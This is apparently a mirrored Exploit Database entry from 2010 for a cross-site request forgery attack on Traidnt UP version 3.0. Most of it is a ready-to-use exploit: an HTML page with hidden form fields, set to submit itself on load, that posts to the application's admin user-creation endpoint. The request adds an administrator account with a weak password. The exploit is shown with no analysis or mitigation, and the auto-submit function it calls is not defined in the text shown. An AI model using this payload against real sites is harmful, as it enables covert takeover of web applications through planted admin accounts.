Traidnt UP – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 10 阅读

• 作者： John Johnz
  日期： 2010-09-24
• 类别：

  • webapps
  平台：

  • windows_x86
• 来源：https://www.exploit-db.com/exploits/15102/

• # Exploit Title: Traidnt UP - CSRF Add Admin Account
  # Date: 24-09-2010
  # Author: G0D-F4Th3r
  # Software Link: http://www.traidnt.net
  # Software Download:
  http://traidntup.googlecode.com/files/Traidnt%20up%20V3.0.zip
  # Version: 3.0
  #######################Exploit#######################################
  <html>
  <body onload="javascript:fireForms()">
  <form method="POST" name="form0" action="
  http://www.site.com/[path]/admin/users.php?do=addnew">
  <input type="hidden" name="name" value="admin2"/>
  <input type="hidden" name="password" value="123456"/>
  <input type="hidden" name="email" value="mail@mail.com"/>
  <input type="hidden" name="birthdate" value="1985"/>
  <input type="hidden" name="country" value="Saudi Arabia"/>
  <input type="hidden" name="group" value="1"/>
  </form>
  </body>
  </html>